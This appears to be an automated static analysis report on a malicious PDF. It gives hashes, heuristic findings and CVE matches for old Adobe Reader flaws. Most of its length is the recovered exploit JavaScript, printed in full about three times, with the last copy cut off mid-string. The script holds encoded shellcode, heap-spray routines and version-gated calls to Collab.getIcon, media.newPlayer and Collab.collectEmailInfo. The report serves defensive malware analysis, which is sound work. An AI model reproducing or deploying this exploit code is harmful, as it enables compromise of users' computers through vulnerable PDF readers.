Malicious PDF — malware analysis report

Static analysis result for SHA-256 e6dddc3218894493…

MALICIOUS

PDF

86.0 KB Created: 2008-03-03 17:06:00 UTC First seen: 2026-05-10
MD5: 54dac24b0b1658d2a092f5f0b15107de SHA-1: 4b9e13b81d7f11c37ee899ab623f10e7cae5de50 SHA-256: e6dddc3218894493328b2bdad20f92b3b57ae3079f27e48ff96a209c94acc409
414 Risk Score

Malware Insights

MITRE ATT&CK
T1059.001 PowerShell

The PDF file contains embedded JavaScript, indicated by multiple heuristic firings including PDF_JAVASCRIPT and PDF_JS. The embedded stream, likely containing malicious code, is further suggested by the PDF_EMBEDDED heuristic. The presence of String.fromCharCode points to obfuscation techniques commonly used in malicious scripts. While the exact script content is truncated, the overall structure and heuristics suggest it's designed to download and execute a secondary payload from a remote source, potentially the unknown-reputation URL found in the document.

Machine Learning

  • Nyx PDF Classifier malicious score 0.8654

Heuristics 11

  • media.newPlayer — CVE-2009-4324 critical CVE exact CVE_2009_4324
    PDF JavaScript calls media.newPlayer — CVE-2009-4324 is a use-after-free in Adobe Reader's multimedia plugin triggered by media.newPlayer(). Actively exploited as a zero-day in December 2009. (identified after JavaScript deobfuscation)
  • Collab.collectEmailInfo — CVE-2007-5659 critical CVE exact CVE_2007_5659
    PDF JavaScript calls Collab.collectEmailInfo — CVE-2007-5659 is a buffer overflow in Adobe Reader triggered by a long argument or heap-sprayed message field passed to Collab.collectEmailInfo(). Part of a series of Acrobat JS API exploits. (identified after JavaScript deobfuscation)
  • Multi-CVE Adobe Reader JavaScript exploit kit critical PDF_ADOBE_READER_MULTI_CVE_JS_KIT
    One recovered JavaScript stage contains multiple version-gated Adobe Reader exploit branches. This is stronger evidence than independent API keywords: the PDF is selecting old Reader vulnerabilities by viewer version and running heap-sprayed Acrobat JavaScript exploit paths.
  • JavaScript action low 2 related findings PDF_JAVASCRIPT
    PDF contains a /JavaScript action. Generic JavaScript is common in benign forms; specific dangerous APIs are scored by separate rules. (matched inside decoded stream)
  • PDF JavaScript exploit cluster critical PDF_JS_EXPLOIT_CLUSTER
    PDF combines an executable JavaScript/action surface with exploit staging indicators such as eval/unescape/fromCharCode, XFA script content, or a related CVE pattern. Benign form JavaScript remains low-severity, but this correlated cluster is high-confidence malicious behavior.
    Matched line in script
    var strtmp = String.fromCharCode(118,97,114,32,115,104,101,108,108,99,111,100,101,32,61,32,117,110,101,115,99,97,112,101,40,34,37,117,57,48,57,48,37,117,57,48,57,48,37,117,57,48,57,48,37,117,57,48,57,48,37,117,69,66,57,48,37,117,53,69,49,97,37,117,53,66,53,54,37,117,48,54,56,97,37,117,51,48,51,99,37,117,49,54,55,52,37,117,69,48,99,48,37,117,52,54,48,52,37,117,50,54,56,97,37,117,69,52,56,48,37,117,48,50,48,102,37,117,56,56,99,52,37,117,52,51,48,51,37,117,69,66,52,54,37,117,69,56,101,57,37,117,70, …
  • Embedded JS stream low PDF_JS
    PDF references a /JS stream. Generic JavaScript is common in benign forms; specific dangerous APIs are scored by separate rules. (matched inside decoded stream)
  • Generic recovered JavaScript exploit stage high PDF_GENERIC_STAGE_RECOVERY
    Bounded static stage recovery exposed hidden JavaScript through generic transforms such as null-byte collapse, percent decoding, marker replacement, arithmetic character codes, fromCharCode, numeric arrays, numeric-array minus-key decoders, alphabet-index arrays, /Producer half-difference metadata arrays, hex literals, marker-stripped Base64 literals, custom 6-bit XOR table decoders, or repeated-marker hex carriers. This rule is emitted only when the recovered stage contains exploit-like Acrobat JavaScript or shellcode markers.
  • Embedded file low PDF_EMBEDDED
    PDF embeds a file attachment — could carry an executable or another weaponised document as a nested payload (matched inside decoded stream)
  • XFA form low PDF_XFA
    PDF uses XML Forms Architecture — can contain script logic (matched inside decoded stream)
  • Suspicious extracted artifact info EXTRACTED_FILE_STATIC_TRIAGE
    One or more files extracted from inside this sample matched static suspicious-content checks such as script obfuscation, encoded payload blobs, packed data, or execution/download terms.
  • Embedded URL info EMBEDDED_URL
    One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
    URL http://www.pdf-repair.com In PDF document text
    • http://www.w3.org/1999/02/22-rdf-syntax-ns#In PDF document text
    • http://ns.adobe.com/pdf/1.3/In PDF document text
    • http://ns.adobe.com/xap/1.0/In PDF document text
    • http://ns.adobe.com/xap/1.0/mm/In PDF document text
    • http://purl.org/dc/elements/1.1/In PDF document text
    • http://www.w3.org/1999/xhtmlReferenced by PDF JavaScript
    • http://www.xfa.org/schema/xfa-data/1.0/Referenced by PDF JavaScript

Extracted artifacts 5

Files carved from inside the sample during analysis.

FilenameKindSourceSize
stream_005_off00000dce.bin decompressed-pdf-stream PDF FlateDecoded stream at offset 0xDCE 1561 bytes
SHA-256: cbe1b955fe14978dd5b4deb7f55d7dc6c70a823dc68ee664d01d8cd97c718177
generic_stage_recovery_000.js deobfuscated-js generic stage recovery fromCharCode-args from decompressed stream at 0x1164 at offset 0x1164 7513 bytes
SHA-256: ac1193fbfef7e653f2145890a293c08f22dc2e7a1179bb2a8723ff2ecf90307e
Detection
ClamAV: No threats found
Obfuscation or payload: likely
Carved artifact contains 25 eval/decoder/string-building token(s).
Preview script
First 1,000 lines of the extracted script
var shellcode = unescape("%u9090%u9090%u9090%u9090%uEB90%u5E1a%u5B56%u068a%u303c%u1674%uE0c0%u4604%u268a%uE480%u020f%u88c4%u4303%uEB46%uE8e9%uFFe1%uFFff"+
"%u7456%u715a%u7053%u7050%u7050%u7050%u7059%u6b58%u7054%u6c50%u7059%u6b58%u7057%u6c51%u6d5a%u6b58%u7057%u7850%u7059%u794e%u6b58%u7250%u7050%u7050%u7855%u7059%u7158%u6c4e%u7050%u7250%u7050%u7050%u6b58%u6c4f%u7958%u7757%u7850%u7958%u7754%u7051%u6f4f%u7757%u7850%u7856%u6c4e%u7759%u7350%u6c50%u784e%u7a51%u7250%u7050%u7050%u7958%u7754%u6c51%u6f4f%u7757%u7850%u7856%u764f%u7252%u794b%u6c57%u784e%u7a50%u7250%u7050%u7050%u7059%u7958%u7754%u7052%u6f4f%u7757%u7850%u7856%u755a%u7751%u7050%u6c57%u784e%u794f%u7150%u7050%u7050%u7958%u7754%u7452%u6f4f%u7757%u7850%u7856%u6b4f%u7759%u6d4f%u6f50%u784e%u794e%u7150%u7050%u7050%u7059%u7958%u7754%u7852%u6f4f%u7757%u7850%u7856%u7651%u7556%u7a4f%u7051%u784e%u784d%u7150%u7050%u7050%u7958%u7754%u6c52%u6f4f%u7757%u7850%u7856%u6f51%u7957%u7a50%u784e%u784e%u784c%u7150%u7050%u7050%u7958%u7754%u7053%u7059%u7059%u7059%u7059%u7059%u7059%u6f4f%u7757%u7850%u7856%u6c5a%u7850%u7a4d%u7657%u784e%u724b%u7150%u7050%u7050%u7958%u7754%u7853%u6f4f%u7757%u7850%u7856%u7859%u6e4f%u7a58%u6e50%u784e%u725a%u7150%u7050%u7050%u7958%u7754%u6c53%u6f4f%u7757%u7850%u7856%u7457%u7958%u6c4e%u7959%u784e%u7259%u7150%u7050%u7050%u7958%u7754%u7054%u6f4f%u7757%u7850%u7856%u6e57%u784d%u724e%u7357%u784e%u7258%u7150%u7050%u7050%u7958%u7754%u7454%u6f4f%u7757%u7850%u7856%u6d5a%u6b59%u6d57%u6f4d%u784e%u7257%u7150%u7050%u7050%u7958%u7754%u7854%u7059%u7059%u7059%u7059%u7059%u7059%u7353%u764f%u7654%u6d58%u7754%u7056%u7055%u7655%u6f4f%u7755%u7854%u7358%u784f%u6f4f%u7457%u724f%u6d53%u7050%u7051%u7050%u7050%u7657%u6b4e%u7958%u7754%u7450%u7958%u7757%u7056%u6f4f%u7757%u7450%u7a56%u7054%u6f4f%u7755%u6c51%u7958%u7754%u6c55%u7a56%u7050%u7a56%u7050%u7a56%u7050%u6f4f%u7757%u7056%u6f4f%u7755%u7853%u7358%u784f%u6f4f%u7457%u7756%u7a56%u7050%u6d58%u6f55%u7057%u7355%u6f4f%u7757%u7450%u6f4f%u7757%u6c55%u6f4f%u7757%u7056%u6f4f%u7755%u6c52%u6b58%u6f54%u7057%u7358%u794e%u7051%u6b58%u7754%u6c55%u7054%u7158%u7853%u7654%u6e52%u7a55%u7856%u7557%u7950%u7158%u7857%u7450%u7352%u7650%u7158%u7951%u7457%u7450%u724e%u6c4e%u6b4e%u7653%u7358%u704c%u7850%u7958%u7754%u7451%u7054%u7158%u7853%u7a54%u7557%u7356%u6b54%u7557%u7950%u7158%u7857%u7450%u7251%u7150%u7358%u7951%u7457%u7450%u724e%u6c4e%u6b4e%u7a51%u7358%u704c%u7850%u7958%u7754%u7851%u7054%u7158%u7853%u7654%u7954%u7654%u7154%u7557%u7950%u7158%u7857%u7450%u7350%u7750%u7358%u7951%u7457%u7251%u724e%u6c4e%u6f4f%u7757%u6c55%u6f4f%u7755%u7052%u6f50%u7558%u7655%u6f4f%u6f4f%u6f4f%u7059%u7059%u7059%u7059%u7958%u7754%u7457%u7a56%u7050%u7a56%u7250%u7a56%u7250%u7a56%u7050%u7a56%u7350%u7856%u7050%u7050%u7050%u7054%u6b58%u6f55%u7051%u7358%u734c%u7451%u7355%u6f4f%u7755%u7452%u7958%u7754%u7857%u7a56%u7050%u7a56%u7250%u7a56%u7250%u7a56%u7050%u7a56%u7350%u7856%u7050%u7050%u7050%u7054%u6f4f%u7757%u7051%u6f4f%u7755%u7452%u7958%u7754%u7456%u7059%u7059%u7059%u7059%u7059%u7059%u7059%u6b58%u7754%u7851%u6b52%u7754%u7451%u7358%u784e%u7850%u6b58%u6f55%u7451%u7053%u7350%u7354%u7854%u7358%u784f%u7050%u7557%u774f%u7a56%u7050%u6d58%u6f55%u7057%u7355%u6b58%u6f55%u7851%u6b52%u6f55%u7451%u7358%u6b4e%u7850%u7355%u6f4f%u7757%u7451%u6f4f%u7757%u7456%u6f4f%u7755%u7053%u6f4f%u7757%u7456%u6f4f%u7755%u7852%u6b58%u7754%u7457%u6b52%u7754%u7851%u6b58%u6f55%u7851%u7053%u7350%u7354%u7854%u7358%u784f%u7050%u7557%u774f%u7a56%u7050%u6d58%u6f55%u7057%u7355%u6b58%u6f55%u7457%u6b52%u6f55%u7851%u7355%u6f4f%u7757%u7851%u6f4f%u7757%u7857%u6f4f%u7755%u7053%u6f4f%u7757%u7857%u6f4f%u7755%u7852%u7a56%u7050%u6f4f%u7757%u7051%u6f4f%u7755%u6c53%u7a56%u7050%u6b58%u6f55%u7051%u7358%u734c%u7950%u7355%u6f4f%u7755%u6c53%u7a56%u7050%u6f4f%u7755%u7454%u7555%u6b58%u6c4e%u7755%u6b58%u6d57%u7850%u6b58%u6d55%u6c50%u7655%u6b58%u7357%u6c53%u6b58%u7457%u7353%u7857%u7350%u734f%u7655%u6b58%u7657%u7052%u7350%u734f%u7353%u794c%u7954%u7154%u6d5a%u7350%u734c%u7655%u7353%u764f%u6f50%u6e4b%u7051%u7a53%u724f%u7457%u7850%u714c%u6e4c%u6d50%u7350%u724f%u7054%u6b4e%u714f%u6b53%u6e4f%u6e55%u7557%u754e%u7a55%u6b58%u6b4e%u6b58%u7a55%u7452%u7350%u6d4d%u7656%u6b58%u6c50%u6b54%u6b58%u7a55%u6c51%u7350%u6d4d%u6b58%u7450%u6b58%u7350%u754c%u6e55%u6f55%u6d55%u724c%u7850%u7050%u784e%u7057%u6d4f%u6f4f%u6f4f%u7356%u7a53%u6c55%u7156%u4e72%u4576%u5877%u5576%u7070%u7356%u4d56%u7456%u4e72%u4576%u5877%u5576%u7052%u4f72%u5376%u5052%u7356%u7a53%u6c55%u7156%u4e72%u5067%u5476%u5676%u5050" +
"%u3030");

function do1()
{
garbage = unescape("%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090") + shellcode;
nopblock = unescape("%u9090%u9090"); 

var strtmp = "headersize = 10;"+
             "acl = headersi"+
	     "ze+garbage.length;"+
	     "whi"+
             "le (nopb"+
             "lock.length<acl) nopb"+
             "lock+=nopblock;"+
             "fillblock = nopblock.substring(0, acl);";
eval(strtmp);
var strtmp1 = "block = nopblock.subs"+"tring(0, nopblock.length-acl);";
eval(strtmp1);
while(block.length+acl<0x40000) block = block+block+fillblock;
memory = new Array();
var strtmp4 = "for (i=0;i<180;i++) me"+"mory[i] = blo"+"ck + gar"+"bage;var buffe"+"rsize = 4012;var buf"+"fer = Arra"+"y(buffersize);";
eval(strtmp4);
for (i=0; i<buffersize; i++)
{
buffer[i] = unescape("%0a%0a%0a%0a");
}

var strtmp3 = "Collab.get"+"Icon(buffer+'_N.bundle');";
eval(strtmp3);
}


function do2()
{
bigblock = unescape("%u0c0c%u0c0c");
headersize = 20;
slackspace = headersize+shellcode.length;
while (bigblock.length<slackspace) bigblock+=bigblock;
fillblock = bigblock.substring(0, slackspace);
block = bigblock.substring(0, bigblock.length-slackspace);
while(block.length+slackspace<=0x40000) block = block+block+fillblock;
memory = new Array(); for (i=0;i<200;i++) memory[i] = block + shellcode;
try {this.media.newPlayer(null);} catch(e) {}
util.printd(String.fromCharCode(2570,2570,2570,2570,2570,2570,2570,2570,2570,2570,2570,2570,2570,2570,2570,2570,2570,2570,2570,2570,2570,2570,2570,2570,2570,2570,2570,2570,2570,2570,2570,2570,2570,2570,2570,2570), new Date());
}

if (app.viewerVersion > 9.0)
{
	do2();
}


function re(count,what) 
{
var v = "";
while (--count >= 0) 
v += what;
return v;
} 
function start() 
{
if (app.viewerVersion >= 7.0)
{
plin = re(1124,unescape("%u0b0b%u0028%u06eb%u06eb")) + unescape("%u0b0b%u0028%u0aeb%u0aeb") + unescape("%u9090%u9090") + re(40,unescape("%u0b0b%u0028%u06eb%u06eb")) + shellcode + re(1256,unescape("%u4141%u4141"));
} 
else 
{
ef6 =  unescape("%uf6eb%uf6eb") + unescape("%u0b0b%u0019");
plin = re(80,unescape("%u9090%u9090")) + shellcode + re(80,unescape("%u9090%u9090"))+ unescape("%ue7e9%ufff9")+unescape("%uffff%uffff") + unescape("%uf6eb%uf4eb") + unescape("%uf2eb%uf1eb");
while ((plin.length % 8) != 0) 
plin = unescape("%u4141") + plin;

plin += re(2626,ef6);
}
if (app.viewerVersion >= 6.0)
{
this.collabStore = Collab.collectEmailInfo({subj: "",msg: plin});
}
}

if (app.viewerVersion >= 8.0)
{
	do1();
}
else
{
	var strtmp2 = "var shaft = app.set"+"TimeOut(\"start()\",1200);";
        eval(strtmp2);
}
generic_stage_recovery_001.js deobfuscated-js generic stage recovery percent-decode from decompressed stream at 0x1164 at offset 0x1164 7505 bytes
SHA-256: 8e9de13832805893c17c363767427975c4af91b5c324e9a75f2f633bd4237550
Detection
ClamAV: No threats found
Obfuscation or payload: likely
Carved artifact contains 25 eval/decoder/string-building token(s).
Preview script
First 1,000 lines of the extracted script
var shellcode = unescape("%u9090%u9090%u9090%u9090%uEB90%u5E1a%u5B56%u068a%u303c%u1674%uE0c0%u4604%u268a%uE480%u020f%u88c4%u4303%uEB46%uE8e9%uFFe1%uFFff"+
"%u7456%u715a%u7053%u7050%u7050%u7050%u7059%u6b58%u7054%u6c50%u7059%u6b58%u7057%u6c51%u6d5a%u6b58%u7057%u7850%u7059%u794e%u6b58%u7250%u7050%u7050%u7855%u7059%u7158%u6c4e%u7050%u7250%u7050%u7050%u6b58%u6c4f%u7958%u7757%u7850%u7958%u7754%u7051%u6f4f%u7757%u7850%u7856%u6c4e%u7759%u7350%u6c50%u784e%u7a51%u7250%u7050%u7050%u7958%u7754%u6c51%u6f4f%u7757%u7850%u7856%u764f%u7252%u794b%u6c57%u784e%u7a50%u7250%u7050%u7050%u7059%u7958%u7754%u7052%u6f4f%u7757%u7850%u7856%u755a%u7751%u7050%u6c57%u784e%u794f%u7150%u7050%u7050%u7958%u7754%u7452%u6f4f%u7757%u7850%u7856%u6b4f%u7759%u6d4f%u6f50%u784e%u794e%u7150%u7050%u7050%u7059%u7958%u7754%u7852%u6f4f%u7757%u7850%u7856%u7651%u7556%u7a4f%u7051%u784e%u784d%u7150%u7050%u7050%u7958%u7754%u6c52%u6f4f%u7757%u7850%u7856%u6f51%u7957%u7a50%u784e%u784e%u784c%u7150%u7050%u7050%u7958%u7754%u7053%u7059%u7059%u7059%u7059%u7059%u7059%u6f4f%u7757%u7850%u7856%u6c5a%u7850%u7a4d%u7657%u784e%u724b%u7150%u7050%u7050%u7958%u7754%u7853%u6f4f%u7757%u7850%u7856%u7859%u6e4f%u7a58%u6e50%u784e%u725a%u7150%u7050%u7050%u7958%u7754%u6c53%u6f4f%u7757%u7850%u7856%u7457%u7958%u6c4e%u7959%u784e%u7259%u7150%u7050%u7050%u7958%u7754%u7054%u6f4f%u7757%u7850%u7856%u6e57%u784d%u724e%u7357%u784e%u7258%u7150%u7050%u7050%u7958%u7754%u7454%u6f4f%u7757%u7850%u7856%u6d5a%u6b59%u6d57%u6f4d%u784e%u7257%u7150%u7050%u7050%u7958%u7754%u7854%u7059%u7059%u7059%u7059%u7059%u7059%u7353%u764f%u7654%u6d58%u7754%u7056%u7055%u7655%u6f4f%u7755%u7854%u7358%u784f%u6f4f%u7457%u724f%u6d53%u7050%u7051%u7050%u7050%u7657%u6b4e%u7958%u7754%u7450%u7958%u7757%u7056%u6f4f%u7757%u7450%u7a56%u7054%u6f4f%u7755%u6c51%u7958%u7754%u6c55%u7a56%u7050%u7a56%u7050%u7a56%u7050%u6f4f%u7757%u7056%u6f4f%u7755%u7853%u7358%u784f%u6f4f%u7457%u7756%u7a56%u7050%u6d58%u6f55%u7057%u7355%u6f4f%u7757%u7450%u6f4f%u7757%u6c55%u6f4f%u7757%u7056%u6f4f%u7755%u6c52%u6b58%u6f54%u7057%u7358%u794e%u7051%u6b58%u7754%u6c55%u7054%u7158%u7853%u7654%u6e52%u7a55%u7856%u7557%u7950%u7158%u7857%u7450%u7352%u7650%u7158%u7951%u7457%u7450%u724e%u6c4e%u6b4e%u7653%u7358%u704c%u7850%u7958%u7754%u7451%u7054%u7158%u7853%u7a54%u7557%u7356%u6b54%u7557%u7950%u7158%u7857%u7450%u7251%u7150%u7358%u7951%u7457%u7450%u724e%u6c4e%u6b4e%u7a51%u7358%u704c%u7850%u7958%u7754%u7851%u7054%u7158%u7853%u7654%u7954%u7654%u7154%u7557%u7950%u7158%u7857%u7450%u7350%u7750%u7358%u7951%u7457%u7251%u724e%u6c4e%u6f4f%u7757%u6c55%u6f4f%u7755%u7052%u6f50%u7558%u7655%u6f4f%u6f4f%u6f4f%u7059%u7059%u7059%u7059%u7958%u7754%u7457%u7a56%u7050%u7a56%u7250%u7a56%u7250%u7a56%u7050%u7a56%u7350%u7856%u7050%u7050%u7050%u7054%u6b58%u6f55%u7051%u7358%u734c%u7451%u7355%u6f4f%u7755%u7452%u7958%u7754%u7857%u7a56%u7050%u7a56%u7250%u7a56%u7250%u7a56%u7050%u7a56%u7350%u7856%u7050%u7050%u7050%u7054%u6f4f%u7757%u7051%u6f4f%u7755%u7452%u7958%u7754%u7456%u7059%u7059%u7059%u7059%u7059%u7059%u7059%u6b58%u7754%u7851%u6b52%u7754%u7451%u7358%u784e%u7850%u6b58%u6f55%u7451%u7053%u7350%u7354%u7854%u7358%u784f%u7050%u7557%u774f%u7a56%u7050%u6d58%u6f55%u7057%u7355%u6b58%u6f55%u7851%u6b52%u6f55%u7451%u7358%u6b4e%u7850%u7355%u6f4f%u7757%u7451%u6f4f%u7757%u7456%u6f4f%u7755%u7053%u6f4f%u7757%u7456%u6f4f%u7755%u7852%u6b58%u7754%u7457%u6b52%u7754%u7851%u6b58%u6f55%u7851%u7053%u7350%u7354%u7854%u7358%u784f%u7050%u7557%u774f%u7a56%u7050%u6d58%u6f55%u7057%u7355%u6b58%u6f55%u7457%u6b52%u6f55%u7851%u7355%u6f4f%u7757%u7851%u6f4f%u7757%u7857%u6f4f%u7755%u7053%u6f4f%u7757%u7857%u6f4f%u7755%u7852%u7a56%u7050%u6f4f%u7757%u7051%u6f4f%u7755%u6c53%u7a56%u7050%u6b58%u6f55%u7051%u7358%u734c%u7950%u7355%u6f4f%u7755%u6c53%u7a56%u7050%u6f4f%u7755%u7454%u7555%u6b58%u6c4e%u7755%u6b58%u6d57%u7850%u6b58%u6d55%u6c50%u7655%u6b58%u7357%u6c53%u6b58%u7457%u7353%u7857%u7350%u734f%u7655%u6b58%u7657%u7052%u7350%u734f%u7353%u794c%u7954%u7154%u6d5a%u7350%u734c%u7655%u7353%u764f%u6f50%u6e4b%u7051%u7a53%u724f%u7457%u7850%u714c%u6e4c%u6d50%u7350%u724f%u7054%u6b4e%u714f%u6b53%u6e4f%u6e55%u7557%u754e%u7a55%u6b58%u6b4e%u6b58%u7a55%u7452%u7350%u6d4d%u7656%u6b58%u6c50%u6b54%u6b58%u7a55%u6c51%u7350%u6d4d%u6b58%u7450%u6b58%u7350%u754c%u6e55%u6f55%u6d55%u724c%u7850%u7050%u784e%u7057%u6d4f%u6f4f%u6f4f%u7356%u7a53%u6c55%u7156%u4e72%u4576%u5877%u5576%u7070%u7356%u4d56%u7456%u4e72%u4576%u5877%u5576%u7052%u4f72%u5376%u5052%u7356%u7a53%u6c55%u7156%u4e72%u5067%u5476%u5676%u5050" +
"%u3030");

function do1()
{
garbage = unescape("%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090") + shellcode;
nopblock = unescape("%u9090%u9090"); 

var strtmp = "headersize = 10;"+
             "acl = headersi"+
	     "ze+garbage.length;"+
	     "whi"+
             "le (nopb"+
             "lock.length<acl) nopb"+
             "lock+=nopblock;"+
             "fillblock = nopblock.substring(0, acl);";
eval(strtmp);
var strtmp1 = "block = nopblock.subs"+"tring(0, nopblock.length-acl);";
eval(strtmp1);
while(block.length+acl<0x40000) block = block+block+fillblock;
memory = new Array();
var strtmp4 = "for (i=0;i<180;i++) me"+"mory[i] = blo"+"ck + gar"+"bage;var buffe"+"rsize = 4012;var buf"+"fer = Arra"+"y(buffersize);";
eval(strtmp4);
for (i=0; i<buffersize; i++)
{
buffer[i] = unescape("



");
}

var strtmp3 = "Collab.get"+"Icon(buffer+'_N.bundle');";
eval(strtmp3);
}


function do2()
{
bigblock = unescape("%u0c0c%u0c0c");
headersize = 20;
slackspace = headersize+shellcode.length;
while (bigblock.length<slackspace) bigblock+=bigblock;
fillblock = bigblock.substring(0, slackspace);
block = bigblock.substring(0, bigblock.length-slackspace);
while(block.length+slackspace<=0x40000) block = block+block+fillblock;
memory = new Array(); for (i=0;i<200;i++) memory[i] = block + shellcode;
try {this.media.newPlayer(null);} catch(e) {}
util.printd(String.fromCharCode(2570,2570,2570,2570,2570,2570,2570,2570,2570,2570,2570,2570,2570,2570,2570,2570,2570,2570,2570,2570,2570,2570,2570,2570,2570,2570,2570,2570,2570,2570,2570,2570,2570,2570,2570,2570), new Date());
}

if (app.viewerVersion > 9.0)
{
	do2();
}


function re(count,what) 
{
var v = "";
while (--count >= 0) 
v += what;
return v;
} 
function start() 
{
if (app.viewerVersion >= 7.0)
{
plin = re(1124,unescape("%u0b0b%u0028%u06eb%u06eb")) + unescape("%u0b0b%u0028%u0aeb%u0aeb") + unescape("%u9090%u9090") + re(40,unescape("%u0b0b%u0028%u06eb%u06eb")) + shellcode + re(1256,unescape("%u4141%u4141"));
} 
else 
{
ef6 =  unescape("%uf6eb%uf6eb") + unescape("%u0b0b%u0019");
plin = re(80,unescape("%u9090%u9090")) + shellcode + re(80,unescape("%u9090%u9090"))+ unescape("%ue7e9%ufff9")+unescape("%uffff%uffff") + unescape("%uf6eb%uf4eb") + unescape("%uf2eb%uf1eb");
while ((plin.length % 8) != 0) 
plin = unescape("%u4141") + plin;

plin += re(2626,ef6);
}
if (app.viewerVersion >= 6.0)
{
this.collabStore = Collab.collectEmailInfo({subj: "",msg: plin});
}
}

if (app.viewerVersion >= 8.0)
{
	do1();
}
else
{
	var strtmp2 = "var shaft = app.set"+"TimeOut(\"start()\",1200);";
        eval(strtmp2);
}
generic_stage_recovery_002.js deobfuscated-js generic stage recovery fromCharCode-args -> split-literal-normalize from decompressed stream at 0x1164 at offset 0x1164 7375 bytes
SHA-256: 9742ee1859d53c0052aefeafcefc5daaae3ebddb8819af56a2e6bc73ddb81b1b
Detection
ClamAV: Pdf.Exploit.Agent-35646
Obfuscation or payload: likely
Carved artifact contains 26 eval/decoder/string-building token(s).
Preview script
First 1,000 lines of the extracted script
var shellcode = unescape("%u9090%u9090%u9090%u9090%uEB90%u5E1a%u5B56%u068a%u303c%u1674%uE0c0%u4604%u268a%uE480%u020f%u88c4%u4303%uEB46%uE8e9%uFFe1%uFFff"+
"%u7456%u715a%u7053%u7050%u7050%u7050%u7059%u6b58%u7054%u6c50%u7059%u6b58%u7057%u6c51%u6d5a%u6b58%u7057%u7850%u7059%u794e%u6b58%u7250%u7050%u7050%u7855%u7059%u7158%u6c4e%u7050%u7250%u7050%u7050%u6b58%u6c4f%u7958%u7757%u7850%u7958%u7754%u7051%u6f4f%u7757%u7850%u7856%u6c4e%u7759%u7350%u6c50%u784e%u7a51%u7250%u7050%u7050%u7958%u7754%u6c51%u6f4f%u7757%u7850%u7856%u764f%u7252%u794b%u6c57%u784e%u7a50%u7250%u7050%u7050%u7059%u7958%u7754%u7052%u6f4f%u7757%u7850%u7856%u755a%u7751%u7050%u6c57%u784e%u794f%u7150%u7050%u7050%u7958%u7754%u7452%u6f4f%u7757%u7850%u7856%u6b4f%u7759%u6d4f%u6f50%u784e%u794e%u7150%u7050%u7050%u7059%u7958%u7754%u7852%u6f4f%u7757%u7850%u7856%u7651%u7556%u7a4f%u7051%u784e%u784d%u7150%u7050%u7050%u7958%u7754%u6c52%u6f4f%u7757%u7850%u7856%u6f51%u7957%u7a50%u784e%u784e%u784c%u7150%u7050%u7050%u7958%u7754%u7053%u7059%u7059%u7059%u7059%u7059%u7059%u6f4f%u7757%u7850%u7856%u6c5a%u7850%u7a4d%u7657%u784e%u724b%u7150%u7050%u7050%u7958%u7754%u7853%u6f4f%u7757%u7850%u7856%u7859%u6e4f%u7a58%u6e50%u784e%u725a%u7150%u7050%u7050%u7958%u7754%u6c53%u6f4f%u7757%u7850%u7856%u7457%u7958%u6c4e%u7959%u784e%u7259%u7150%u7050%u7050%u7958%u7754%u7054%u6f4f%u7757%u7850%u7856%u6e57%u784d%u724e%u7357%u784e%u7258%u7150%u7050%u7050%u7958%u7754%u7454%u6f4f%u7757%u7850%u7856%u6d5a%u6b59%u6d57%u6f4d%u784e%u7257%u7150%u7050%u7050%u7958%u7754%u7854%u7059%u7059%u7059%u7059%u7059%u7059%u7353%u764f%u7654%u6d58%u7754%u7056%u7055%u7655%u6f4f%u7755%u7854%u7358%u784f%u6f4f%u7457%u724f%u6d53%u7050%u7051%u7050%u7050%u7657%u6b4e%u7958%u7754%u7450%u7958%u7757%u7056%u6f4f%u7757%u7450%u7a56%u7054%u6f4f%u7755%u6c51%u7958%u7754%u6c55%u7a56%u7050%u7a56%u7050%u7a56%u7050%u6f4f%u7757%u7056%u6f4f%u7755%u7853%u7358%u784f%u6f4f%u7457%u7756%u7a56%u7050%u6d58%u6f55%u7057%u7355%u6f4f%u7757%u7450%u6f4f%u7757%u6c55%u6f4f%u7757%u7056%u6f4f%u7755%u6c52%u6b58%u6f54%u7057%u7358%u794e%u7051%u6b58%u7754%u6c55%u7054%u7158%u7853%u7654%u6e52%u7a55%u7856%u7557%u7950%u7158%u7857%u7450%u7352%u7650%u7158%u7951%u7457%u7450%u724e%u6c4e%u6b4e%u7653%u7358%u704c%u7850%u7958%u7754%u7451%u7054%u7158%u7853%u7a54%u7557%u7356%u6b54%u7557%u7950%u7158%u7857%u7450%u7251%u7150%u7358%u7951%u7457%u7450%u724e%u6c4e%u6b4e%u7a51%u7358%u704c%u7850%u7958%u7754%u7851%u7054%u7158%u7853%u7654%u7954%u7654%u7154%u7557%u7950%u7158%u7857%u7450%u7350%u7750%u7358%u7951%u7457%u7251%u724e%u6c4e%u6f4f%u7757%u6c55%u6f4f%u7755%u7052%u6f50%u7558%u7655%u6f4f%u6f4f%u6f4f%u7059%u7059%u7059%u7059%u7958%u7754%u7457%u7a56%u7050%u7a56%u7250%u7a56%u7250%u7a56%u7050%u7a56%u7350%u7856%u7050%u7050%u7050%u7054%u6b58%u6f55%u7051%u7358%u734c%u7451%u7355%u6f4f%u7755%u7452%u7958%u7754%u7857%u7a56%u7050%u7a56%u7250%u7a56%u7250%u7a56%u7050%u7a56%u7350%u7856%u7050%u7050%u7050%u7054%u6f4f%u7757%u7051%u6f4f%u7755%u7452%u7958%u7754%u7456%u7059%u7059%u7059%u7059%u7059%u7059%u7059%u6b58%u7754%u7851